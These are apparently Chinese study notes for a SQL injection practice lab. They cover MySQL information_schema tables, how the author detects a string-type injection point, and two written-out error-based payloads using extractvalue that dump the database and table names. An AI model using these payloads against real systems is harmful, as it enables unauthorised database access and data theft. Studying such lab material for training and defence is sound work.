知识点:
- 报错注入函数语法(详见第二关笔记)
- 报错注入打印位数最多32位
- 对于大于32位的数据最好使用截取函数进行控制;以保证输出完整
- mysql表中的重点数据库
- information_schema (mysql 5.0以上)
- schemata 存放所有数据库名
- schema_name
- tables 存放所有表名
- table_schema
- table_name
- columns 存放所有字段名
- table_schema
- table_name
- column_name
- schemata 存放所有数据库名
- information_schema (mysql 5.0以上)
首先检测注入类型
构造id=1/0
发现输出了一句话;没有报错;但也没有任何有价值的信息
构造id=1
发现输出和1/0一样;说明是字符型注入,而且回显信息固定,无价值
构造id=1'
发现报错了;好的;说明还是单引号的输入提取
进一步验证;构造id=1''
正常输出内容;确认这里存在字符型注入点
由于回显内容固定,所以不能采用联合注入了,只能进行错误注入了
构造payload:id=1' and extractvalue(1,concat(0x7e,database(),0x7e))+--+
成功输出了数据库的名字
下面进一步输出表的名字
构造payload:id=1%27%20and%20extractvalue(1,concat(0x7e,(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=%27security%27),0x7e))+--+
发现也是可以输出的;错误注入的效果还是挺大的
但是这里得注意一个问题:错误注入的输出限制是32位;最好采用截取函数进行控制
10